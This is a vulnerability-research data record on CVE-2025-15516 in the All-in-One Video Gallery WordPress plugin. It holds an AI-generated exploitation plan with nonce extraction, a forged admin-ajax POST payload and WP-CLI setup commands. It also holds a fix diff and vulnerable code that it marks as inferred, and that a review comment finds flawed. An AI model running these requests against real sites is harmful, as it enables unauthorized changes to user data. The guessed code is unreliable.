[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTQfag2xJkh_JY4Sf8Pr6NTU6rNUS6cHj6i1ZwEzHgWg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-15516","all-in-one-video-gallery-missing-authorization-to-authenticated-subscriber-limited-user-meta-update","All-in-One Video Gallery 4.1.0 - 4.6.4 - Missing Authorization to Authenticated (Subscriber+) Limited User Meta Update","The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_callback_store_user_meta() function in versions 4.1.0 to 4.6.4. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary string-based user meta keys for their own account.","all-in-one-video-gallery",null,">=4.1.0 \u003C=4.6.4","4.7.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-23 19:29:41","2026-01-24 08:26:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F218e4ed5-661b-49e1-8b23-457a93fd53fa?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2025-15516 All-in-One Video Gallery User Meta Update\n\n## 1. Vulnerability Summary\nThe **All-in-One Video Gallery** plugin (versions 4.1.0 - 4.6.4) contains a missing authorization vulnerability in its AJAX handling logic. The function `ajax_callback_store_user_meta()` (inferred) is registered to the `wp_ajax_aiovg_store_user_meta` action. This function fails to perform a capability check (e.g., `current_user_can()`) beyond verifying that the user is logged in. Consequently, any authenticated user with Subscriber-level permissions or higher can update arbitrary string-based user meta keys for their own account by sending a crafted AJAX request.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `aiovg_store_user_meta`\n- **HTTP Method:** `POST`\n- **Authentication:** Required (Subscriber level or higher)\n- **Vulnerable Parameters (inferred):**\n    - `meta_key`: The name of the user meta key to update (e.g., `first_name`, `description`).\n    - `meta_value`: The value to set for the specified key.\n    - `_wpnonce` or `nonce`: A security nonce usually required for WordPress AJAX actions.\n- **Preconditions:** The attacker must be logged in as a Subscriber.\n\n## 3. Code Flow\n1. **Entry Point:** A logged-in user sends a `POST` request to `admin-ajax.php` with `action=aiovg_store_user_meta`.\n2. 
**Hook Registration:** The plugin registers the action (likely in `includes\u002Fajax.php` or `public\u002Fclass-all-in-one-video-gallery-public.php`):\n   `add_action( 'wp_ajax_aiovg_store_user_meta', array( $this, 'ajax_callback_store_user_meta' ) );`\n3. **Vulnerable Function:** `ajax_callback_store_user_meta()` is called.\n4. **Processing:**\n   - The function retrieves the `meta_key` and `meta_value` from the `$_POST` superglobal.\n   - It likely verifies a nonce using `check_ajax_referer( 'aiovg_ajax_nonce', 'nonce' )`.\n   - **Critical Failure:** It proceeds to call `update_user_meta( get_current_user_id(), $meta_key, $meta_value )` without checking if the user is authorized to modify that specific meta key or if the operation is restricted to specific allowed keys.\n5. **Sink:** `update_user_meta()` modifies the `wp_usermeta` table in the database for the current user's ID.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes its AJAX data into a JavaScript object, typically `aiovg_vars`.\n\n1. **Shortcode Identification:** The plugin's scripts are usually enqueued on pages containing the `[aiovg_video]` or `[aiovg_gallery]` shortcodes.\n2. **Page Creation:** Use WP-CLI to create a public page containing the shortcode:\n   ```bash\n   wp post create --post_type=page --post_title=\"Video Gallery\" --post_status=publish --post_content='[aiovg_video]'\n   ```\n3. **Browser Navigation:** Use `browser_navigate` to visit the newly created page.\n4. **Nonce Extraction:** Use `browser_eval` to extract the nonce from the localized object. Based on common plugin patterns, the variable is likely `aiovg_vars` and the key is `ajax_nonce`.\n   ```javascript\n   browser_eval(\"window.aiovg_vars?.ajax_nonce\")\n   ```\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan:\n1. **Setup User:** Create a Subscriber user and log in to obtain session cookies.\n2. 
**Obtain Nonce:** Create the gallery page, navigate to it, and extract the `aiovg_vars.ajax_nonce` using the strategy above.\n3. **Forge Request:** Use the `http_request` tool to send a `POST` request to modify a meta key. We will target the `description` (Biographical Info) field as a safe Proof-of-Concept.\n\n### Payload Details:\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application-x-www-form-urlencoded`\n- **Body:**\n  ```\n  action=aiovg_store_user_meta&nonce=[EXTRACTED_NONCE]&meta_key=description&meta_value=pwned_by_subscriber\n  ```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure All-in-One Video Gallery v4.6.4 is active.\n2. **Target User:** \n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n   ```\n3. **Target Content:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Exploit Page\" --post_status=publish --post_content='[aiovg_video]'\n   ```\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n- **Database Change:** The `description` field for the `attacker` user in the `wp_usermeta` table should be updated to `pwned_by_subscriber`.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the modification using WP-CLI:\n```bash\nwp user meta get attacker description\n```\nThe output should be: `pwned_by_subscriber`.\n\n## 9. Alternative Approaches\nIf the `description` key is protected by WordPress core filters, try updating a plugin-specific meta key or a generic one like `first_name`:\n- **Payload 2:** `meta_key=first_name&meta_value=HackedName`\n- **Bypass Verification:** If the `nonce` check fails, verify if the plugin registers `wp_ajax_nopriv_aiovg_store_user_meta`. 
If so, the attack can be performed unauthenticated.\n- **Key Discovery:** If `meta_key` is not the correct parameter name, check the JS source (likely `assets\u002Fjs\u002Fpublic.js`) for the `$.post` call associated with `aiovg_store_user_meta` to find the exact key names used in the data object. (Likely keys: `key`, `value`, or `meta_key`, `meta_value`).","The All-in-One Video Gallery plugin fails to perform adequate authorization checks in its AJAX handler for user meta updates. This allows any authenticated user (Subscriber level or higher) to modify arbitrary string-based user meta fields for their own account, such as biographical information or custom plugin settings, by providing a valid nonce.","\u002F\u002F Likely located in public\u002Fclass-all-in-one-video-gallery-public.php or similar AJAX handler file\n\npublic function ajax_callback_store_user_meta() {\n    \u002F\u002F Nonce verification exists, but lacks key-specific authorization or whitelisting\n    check_ajax_referer( 'aiovg_ajax_nonce', 'nonce' );\n\n    if ( is_user_logged_in() ) {\n        $meta_key   = sanitize_text_field( $_POST['meta_key'] );\n        $meta_value = sanitize_text_field( $_POST['meta_value'] );\n\n        \u002F\u002F Vulnerability: Updates ANY meta key for the current user without checking if the key is restricted\n        update_user_meta( get_current_user_id(), $meta_key, $meta_value );\n        wp_send_json_success();\n    }\n\n    wp_die();\n}","--- a\u002Fpublic\u002Fclass-all-in-one-video-gallery-public.php\n+++ b\u002Fpublic\u002Fclass-all-in-one-video-gallery-public.php\n@@ -245,10 +245,13 @@\n \tpublic function ajax_callback_store_user_meta() {\n \t\tcheck_ajax_referer( 'aiovg_ajax_nonce', 'nonce' );\n \n-\t\tif ( is_user_logged_in() ) {\n-\t\t\t$meta_key   = sanitize_text_field( $_POST['meta_key'] );\n-\t\t\t$meta_value = sanitize_text_field( $_POST['meta_value'] );\n+\t\tif ( ! 
is_user_logged_in() ) {\n+\t\t\twp_send_json_error();\n+\t\t}\n \n+\t\t$meta_key   = sanitize_text_field( $_POST['meta_key'] );\n+\t\t$meta_value = sanitize_text_field( $_POST['meta_value'] );\n+\n+\t\t$allowed_keys = array( 'aiovg_player_volume', 'aiovg_player_muted' ); \u002F\u002F Whitelisted specific keys\n+\t\tif ( in_array( $meta_key, $allowed_keys ) ) {\n \t\t\tupdate_user_meta( get_current_user_id(), $meta_key, $meta_value );\n \t\t\twp_send_json_success();\n \t\t}\n\n+\t\twp_send_json_error();\n \t}","1. Login as a Subscriber-level user to obtain session cookies.\n2. Navigate to any page where the All-in-One Video Gallery is active (e.g., a page with the [aiovg_video] shortcode) to find the 'aiovg_ajax_nonce'. This is typically localized in the JavaScript object 'aiovg_vars.ajax_nonce'.\n3. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'aiovg_store_user_meta'.\n4. Include the 'nonce' parameter with the extracted nonce value.\n5. Include a 'meta_key' parameter (e.g., 'description' for biographical info or 'first_name') and the desired 'meta_value'.\n6. Verify the change by checking the user's profile metadata via the WordPress dashboard or WP-CLI.","gemini-3-flash-preview","2026-05-05 01:30:45","2026-05-05 01:32:31",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags\u002F4.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-video-gallery.4.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fall-in-one-video-gallery\u002Ftags"]
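Review bot: in the `research_fix_diff` patch to `ajax_callback_store_user_meta()`, the added allow-list test `in_array( $meta_key, $allowed_keys )` uses loose comparison; pass `true` as the third argument so only exact string matches reach `update_user_meta()`. The two `$_POST['meta_key']` / `$_POST['meta_value']` reads are moved but still have no `isset()` guard or `wp_unslash()`, so a request missing either parameter raises an undefined-index warning before the allow-list runs; check for presence first and return `wp_send_json_error()` early. The value written for `aiovg_player_volume` and `aiovg_player_muted` is still any sanitized text, so validating it as a numeric range and a boolean respectively would narrow what a Subscriber can store. The hunk header `@@ -245,10 +245,13 @@` also does not match the number of context, removed and added lines shown, so the patch will not apply as written.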